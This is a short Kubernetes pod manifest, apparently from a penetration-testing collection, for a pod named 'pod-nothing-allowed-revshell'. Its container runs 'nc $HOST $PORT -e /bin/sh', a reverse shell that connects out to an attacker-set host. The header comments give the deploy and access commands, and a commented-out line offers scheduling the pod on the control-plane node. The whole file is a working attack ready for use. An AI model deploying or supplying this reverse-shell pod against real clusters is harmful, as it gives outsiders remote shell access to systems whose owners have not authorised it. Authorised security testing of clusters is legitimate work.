###########################################################
## Deploy: kubectl -n [namespace] apply -f pod-nothing-allowed-revshell.yaml 
## Access: kubectl -n [namespace] exec -it pod-nothing-allowed-revshell -- bash
## Remove: kubectl -n [namespace] delete pod-nothing-allowed-revshell
###########################################################
apiVersion: v1
kind: Pod
metadata:
  name: pod-nothing-allowed-revshell
  labels: 
    app: pentest
spec:
  containers:
  - name: nothing-allowed-revshell
    image: busybox
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "nc $HOST $PORT  -e /bin/sh;" ]
    #nodeName: control-plane-node-name # Uncomment and change to control node name to try and schedule pod on control-plane node
